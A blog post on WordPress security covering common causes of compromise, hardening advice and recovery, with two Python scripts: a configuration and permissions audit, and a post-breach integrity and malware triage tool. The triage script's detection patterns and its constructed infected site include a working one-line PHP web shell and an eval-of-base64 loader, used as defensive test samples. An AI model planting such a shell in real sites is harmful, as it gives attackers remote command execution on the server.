WordPress site compromised? You’re not alone.
Ah, WordPress. An excellent platform, but one plagued by security concerns. Earlier this week we were discussing WordPress with a client: its strengths and weaknesses, and what exactly the deal is with security. Plenty has already been written about the subject, but it bears a quick recap of what the problem is and what you can do to avoid it.
The background
We all know that WordPress makes it possible for virtually anyone to put together a credible website. But WordPress’s widespread adoption also puts deployment and administration of these sites into the hands of a large number of people who don’t have the knowledge and skills required to manage the security aspects.
There are currently over a billion sites on the web, and as of September 2016 the W3Techs technology survey puts the share of them powered by WordPress at 26.7%, and growing. That is a staggering number of WordPress sites. Estimates put around 70% of them as vulnerable in some way, which feeds the often-quoted figure of 37,000 websites hacked every day. There is even a public database of WordPress core, plugin and theme vulnerabilities, which lists 5,240 known entries at the time of writing.
So what do you need to know?
Who suffers from WordPress hacks, and why?
Anyone running a WordPress site is a potential target. Most attacks are automated: bots crawl the web looking for known vulnerabilities, and any site exhibiting one will be hit sooner or later simply because the opportunity is there. Being relatively small, or relatively obscure, is no guarantee that your site won't be compromised.
As for the 'why': often it is simply because it is possible. Human beings do things just to prove we can, whether that is climbing mountains or hacking websites. More practically, though, attackers want the system resources a compromised site gives them: they send spam from it, plant malicious redirects and phishing pages, or use it to distribute malware. Outright theft of user data is fairly low on the list of what attackers do with a hacked site, so the fact that you don't store user or credit-card data doesn't mean you won't be targeted.
What’s a vulnerability?
Any code exposed to the web, even well-written code, can eventually be broken into by someone determined enough. And the more widely deployed and freely available the code is, the more attackers will have a crack at it, and by sheer weight of numbers some of them will find a weakness they can exploit. Those weaknesses are what we call 'vulnerabilities'.
WordPress, at its core, is a pretty solid piece of software. It's well-maintained, frequently updated, and built with security in mind. But updates are only partly automatic, which is where the first problem creeps in. Since version 3.7, minor security and maintenance releases install themselves by default, but major releases do not, and administrators can (and do) switch automatic updates off altogether. If users or administrators don't keep their sites on the latest WP release, the fixes for known issues won't be applied, and their sites will carry vulnerabilities which would have been patched had they installed the latest version.
Secondly, WordPress is at the centre of a large open-source development community, and that brings the next problem. There are currently an estimated 44,000 plugins available for WordPress, written by anyone from experienced developers to teenagers in their bedrooms. There are also thousands of themes, again written by a variety of individuals with a variety of skill levels. In many of the instances where a WP site is compromised, it is not WordPress itself that's at fault but a plugin or theme. But for the average WordPress user or administrator, telling the difference between a well-built, secure plugin or theme and one with inherent issues just isn't part of their skill-set.
The third area of vulnerability is actually statistically the largest – and that’s the hosting setup. In 2013 it was reckoned that in 41% of WordPress sites that were hacked, the point of entry was insecure hosting. But because the average WordPress admin – by their own admission – knows very little about hosting, many of them opt for cheap shared hosting which is not geared to security, has no particular monitoring, and often has no backups.
What can I do to prevent these problems?
The areas of weakness above tell us most of what we need to know about how to defend WordPress against intrusion. Keep WordPress updated to the latest version, only use trusted plugins and themes, and choose your hosting carefully. WordPress itself has comprehensive information in its Codex (the 'Hardening WordPress' page) on defending your installation against intrusion.
However, much of the advice in the Codex, like most of the listings in the vulnerability database, will fox anyone but a pretty advanced user. And, let's face it, the technical aspects of updating the core, maintaining backups and monitoring for intrusion attempts are enough to make most folks feel overwhelmed. Life's too short to wrestle with this stuff, and the risks are too high.
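To make the three areas above concrete, here is a small audit script, written for this post as an added example (it is not code from WordPress or its Codex), that walks an installation and reports the things those areas turn on: whether the core version matches the release you expect (the expected version is passed in by the caller; 4.6.1 is used below as an assumed value), whether wp-config.php disables the built-in file editor and keeps automatic core updates on, whether the placeholder salts from wp-config-sample.php are still in use, and whether anything in the tree is world-readable or world-writable. The two demo installs it audits are constructed inline, so it runs offline.

```python
import os
import re
import stat
import tempfile

# define('NAME', value) with value either a bare true/false or a quoted string
DEFINE_RE = re.compile(
    r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*(true|false|'[^']*'|"[^"]*")\s*\)""")

# the placeholder that ships in wp-config-sample.php for every salt
PLACEHOLDER_SALT = "put your unique phrase here"
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY")


def parse_defines(text):
    """Map constant name -> value (quotes stripped) for each define() in wp-config.php."""
    return {name: value.strip("'\"") for name, value in DEFINE_RE.findall(text)}


def core_version(root):
    """Read $wp_version from wp-includes/version.php, or None if it cannot be read."""
    try:
        with open(os.path.join(root, "wp-includes", "version.php"), encoding="utf-8") as f:
            m = re.search(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]", f.read())
    except OSError:
        return None
    return m.group(1) if m else None


def audit(root, expected_core):
    """Return a list of findings; an empty list means nothing here needs attention."""
    findings = []

    # 1. core version: is the site on the release the operator expects?
    ver = core_version(root)
    if ver is None:
        findings.append("core: cannot read wp-includes/version.php")
    elif ver != expected_core:
        findings.append(f"core: {ver} installed, {expected_core} expected")

    # 2. wp-config.php settings and permissions
    cfg = os.path.join(root, "wp-config.php")
    if not os.path.isfile(cfg):
        findings.append("wp-config.php: not found")
    else:
        with open(cfg, encoding="utf-8") as f:
            d = parse_defines(f.read())
        if d.get("DISALLOW_FILE_EDIT") != "true":
            findings.append("wp-config.php: DISALLOW_FILE_EDIT not set (the dashboard can edit PHP files)")
        if d.get("WP_AUTO_UPDATE_CORE") == "false":
            findings.append("wp-config.php: WP_AUTO_UPDATE_CORE is false (security releases are not auto-applied)")
        elif d.get("WP_AUTO_UPDATE_CORE") != "true":
            findings.append("wp-config.php: major core releases still need a manual update")
        if d.get("WP_DEBUG") == "true":
            findings.append("wp-config.php: WP_DEBUG is on")
        if any(d.get(k) == PLACEHOLDER_SALT for k in SALT_KEYS):
            findings.append("wp-config.php: placeholder salts from wp-config-sample.php still in use")
        if stat.S_IMODE(os.stat(cfg).st_mode) & stat.S_IROTH:
            findings.append("wp-config.php: world-readable (contains database credentials)")

    # 3. hosting hygiene: nothing in the tree should be writable by everyone
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            if stat.S_IMODE(os.stat(full).st_mode) & stat.S_IWOTH:
                findings.append(f"{os.path.relpath(full, root)}: world-writable")
    return findings


# --- constructed demo installs (stand-ins, not real WordPress files) --------
def write_site(root, files, modes=None):
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)
        os.chmod(full, (modes or {}).get(rel, 0o644))


WEAK = {
    "wp-includes/version.php": "<?php\n$wp_version = '4.5.3';\n",
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\n"
                     "define('AUTH_KEY', 'put your unique phrase here');\n"
                     "define('WP_DEBUG', true);\n",
    "wp-content/uploads/2016/09/photo.jpg": "",
}
HARDENED = {
    "wp-includes/version.php": "<?php\n$wp_version = '4.6.1';\n",
    "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\n"
                     "define('AUTH_KEY', 'sZ4!v9Q@mLp2#kR8wX1nT6');\n"
                     "define('DISALLOW_FILE_EDIT', true);\n"
                     "define('WP_AUTO_UPDATE_CORE', true);\n",
}


def demo(expected_core="4.6.1"):  # 4.6.1 assumed as the current release
    """Audit one weak and one hardened constructed install; return both finding lists."""
    with tempfile.TemporaryDirectory() as weak, tempfile.TemporaryDirectory() as hard:
        write_site(weak, WEAK, {"wp-content/uploads/2016/09/photo.jpg": 0o666})
        write_site(hard, HARDENED, {"wp-config.php": 0o600})
        return audit(weak, expected_core), audit(hard, expected_core)


if __name__ == "__main__":
    for name, findings in zip(("weak", "hardened"), demo()):
        print(f"{name}: {findings or ['no findings']}")
```

Point `audit()` at the document root of a real install and pass the release you know to be current. It reads nothing but the filesystem, so it is safe to run on a live site, and an empty list is the target state; the DISALLOW_FILE_EDIT and salt checks are the ones most often failed on cheap shared hosting.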
Which is why – while WordPress is an excellent tool for managing content - we recommend putting the security of your WordPress site into the hands of a professional.
And finally…
One aspect that is not often covered in the information about WordPress security is what to do in the wake of a compromise. If it has happened to you, you will know that it can be a recurring problem: once the bots have noticed your site they tend to come back, so there are two things that must happen after a breach. The first is a thorough clean-up of the code, ideally by deleting the installation completely and restoring from a backup taken before the compromise, because once a site has been breached it is very hard to be sure that every piece of malicious code has been removed. The second is to find and remedy the vulnerability which allowed access in the first place, and to change everything the attacker could have read while inside: the admin and database passwords, and the authentication keys and salts in wp-config.php, so that any stolen cookies or sessions stop working. Put the site live again with the vulnerability still in place and you will just end up back where you started.
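The clean-up step is easier to trust if it is verifiable. The script below, added here as an example rather than taken from the original post or from WordPress, compares a live tree against a checksum manifest generated from a clean copy of the same site (WordPress.org publishes per-release checksums for core files in the same path-to-digest shape, but the manifest here is built from a constructed clean tree so the example runs offline), lists files that changed, vanished or appeared, flags any PHP file under wp-content/uploads, and greps every PHP file for the obfuscation idioms common in injected code. A hit means 'read this file by hand', not 'this file is malicious'.

```python
import hashlib
import os
import re
import tempfile

# Obfuscation and remote-control idioms seen in injected PHP.  Each is a
# reason to inspect the file, not proof of compromise on its own.
SUSPICIOUS = [
    (re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
     "eval() of a decoded payload"),
    (re.compile(r"preg_replace\s*\(.*?/e['\"]"), "preg_replace() with the /e modifier"),
    (re.compile(r"(system|passthru|shell_exec|exec|popen)\s*\(\s*"
                r"(base64_decode\s*\(|\$_(GET|POST|REQUEST|COOKIE))"),
     "shell command built from request data"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\("),
     "request parameter called as a function"),
    (re.compile(r"[A-Za-z0-9+/=]{200,}"), "long base64-looking blob"),
]
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> sha256 for every file under root. Run this on a CLEAN copy."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_of(full)
    return manifest


def scan_source(text):
    """Labels of every suspicious idiom found in one file's source."""
    return [label for rx, label in SUSPICIOUS if rx.search(text)]


def triage(root, manifest):
    """Compare the live tree at root against the manifest and scan its PHP files."""
    report = {"modified": [], "missing": [], "unexpected": [],
              "php_in_uploads": [], "suspicious": {}}
    for rel, digest in manifest.items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            report["missing"].append(rel)
        elif sha256_of(full) != digest:
            report["modified"].append(rel)
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            is_php = fn.lower().endswith(PHP_EXT)
            if rel not in manifest:
                report["unexpected"].append(rel)
            # uploads should hold media only; executable code there is a dropped shell
            if is_php and rel.startswith("wp-content/uploads/"):
                report["php_in_uploads"].append(rel)
            if is_php:
                with open(full, encoding="utf-8", errors="replace") as f:
                    hits = scan_source(f.read())
                if hits:
                    report["suspicious"][rel] = hits
    for key in ("modified", "missing", "unexpected", "php_in_uploads"):
        report[key].sort()
    return report


# --- constructed sample site: a clean snapshot and the same site after a break-in
CLEAN_SITE = {
    "wp-includes/version.php": "<?php\n$wp_version = '4.6.1';\n",
    "wp-login.php": "<?php\nrequire __DIR__ . '/wp-load.php';\n",
    "wp-content/plugins/hello/hello.php": "<?php\n/* Plugin Name: Hello */\n",
}
COMPROMISED_SITE = dict(CLEAN_SITE)
# a one-line loader appended to a core file, and a web shell dropped into uploads
COMPROMISED_SITE["wp-login.php"] += "eval(base64_decode('ZWNobyAxOw=='));\n"
COMPROMISED_SITE["wp-content/uploads/2016/09/image.php"] = (
    "<?php if(isset($_GET['c'])){system($_GET['c']);}\n")


def write_site(root, files):
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)


def demo():
    """Manifest from the clean tree, triage of the compromised one; returns the report."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        write_site(clean, CLEAN_SITE)
        write_site(live, COMPROMISED_SITE)
        return triage(live, build_manifest(clean))


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run `build_manifest()` against a known-clean checkout or backup and `triage()` against the live site, and treat modified core files and PHP under uploads as the highest-priority items. Note the ordering problem the post's advice implies: a backup taken after the break-in inherits the backdoor, so the manifest must come from a copy you can place before the compromise, and plugin and theme files are best compared against fresh copies of the same versions from the official directory rather than trusted because they are unchanged since your last backup.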